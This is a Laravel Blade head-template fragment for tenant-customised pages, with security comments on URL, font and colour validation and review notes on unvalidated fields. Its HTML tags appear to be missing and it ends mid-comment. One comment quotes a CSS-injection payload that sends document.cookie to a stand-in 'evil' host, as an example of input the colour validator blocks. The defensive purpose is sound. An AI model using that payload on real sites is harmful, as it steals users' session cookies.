{{-- Tenant-controlled <head> fragment. Every value read from $page below is
     tenant-supplied; each one is run through a context-specific control
     (URL scheme check, font allowlist, hex-colour validation) before it is
     interpolated, because Blade's {{ }} escaping alone is not sufficient in
     URL or CSS contexts. --}}
@if($page->meta_description)
@endif
@if($page->og_image_url)
@endif
{{-- NOTE(review): og_image_url is not gated through UrlSafety here. If it is
     only emitted as a <meta content="..."> value, {{ }} attribute escaping is
     enough (a javascript: scheme in og:image is not navigable by the browser);
     confirm it is not also rendered in an href/src attribute. --}}
@if($page->favicon_url && \App\Support\UrlSafety::isSafeExternalUrl($page->favicon_url))
    {{-- Fix note: favicon_url is tenant-typed and lands in a URL attribute.
         Blade {{ }} only HTML-entity-escapes; it does not reject the
         javascript: scheme, so the entire tag — not just the attribute value —
         is gated behind UrlSafety::isSafeExternalUrl. A rejected URL renders
         nothing rather than an escaped-but-still-dangerous link. --}}
@endif
@if($page->meta_description)
@endif
{{-- NOTE(review): meta_description is checked a second time here — presumably
     for a second tag carrying the same text (e.g. og:description); confirm the
     two blocks are intentionally distinct and not a duplicate. --}}
@php
    // CSS-context defense.
    //
    // These values end up in CSS (custom properties and a font stack). Blade
    // {{ }} escaping is HTML-entity based and does not neutralize CSS syntax
    // inside a <style> element, so the allowlist / safeHex below are the
    // actual control — the escaping is not.
    //
    // font-family: the tenant picks it via Select::make — but Livewire client
    // validation is bypass-able. Server-side allowlist enforcement here
    // ensures the rendered CSS is safe even if a malicious request stored an
    // arbitrary $page->font_family.
    //
    // --primary / --bg: ColorSafety::safeHex rejects CSS-injection payloads
    // like `red; }; body{background:url(//evil/?'+document.cookie+');`.
    // The second argument is presumably the fallback used when the stored
    // value fails validation — confirm against ColorSafety::safeHex.
    $allowedFonts = ['Inter', 'System', 'Roboto', 'Open Sans', 'Lato', 'Poppins', 'Montserrat', 'Nunito'];
    // Strict in_array: a non-string stored value (null, 0, true) cannot
    // loosely match an allowlist entry; anything unknown collapses to Inter.
    $fontFamily = in_array($page->font_family, $allowedFonts, true) ? $page->font_family : 'Inter';
    $isInter = $fontFamily === 'Inter';
    // Non-Inter / non-System names are emitted as a quoted family name. This
    // interpolation is safe only because $fontFamily is guaranteed to be one
    // of the allowlisted literals above — do not widen it to raw input.
    $fontStack = $fontFamily === 'System' ? '-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,sans-serif' : "'{$fontFamily}',sans-serif";
    $safePrimaryColor = \App\Support\ColorSafety::safeHex($page->primary_color, '#4f46e5');
    $safeBgColor = \App\Support\ColorSafety::safeHex($page->background_color, '#ffffff');
@endphp
{{-- Inter is self-hosted under public/vendor/ (no CDN). Other font names
     selected by the tenant (Roboto / Open Sans / Lato / Poppins / Montserrat /
     Nunito) gracefully fall back to the system sans-serif stack — buyers who
     want those fonts can self-host them and extend this template. --}}
@if($isInter)
@endif
@if($page->custom_css)
    {{-- NOTE(review): custom_css is tenant-authored CSS and is the one
         tenant-typed value in this fragment with no visible server-side
         control. If it is emitted raw ({!! !!}) it must already be sanitized
         on save — at minimum reject "</style" (case-insensitive) so the tenant
         cannot break out of the element and inject script. If it is emitted
         with {{ }}, entity escaping will corrupt valid CSS (e.g. `>` child
         combinators, `"` inside url()) without adding safety. Confirm which
         applies; a CSP whose script-src omits 'unsafe-inline' limits the
         blast radius of an element breakout either way. --}}
@endif
{{-- Static rules for this view (success-flash banner) live in the per-view stylesheet. The inline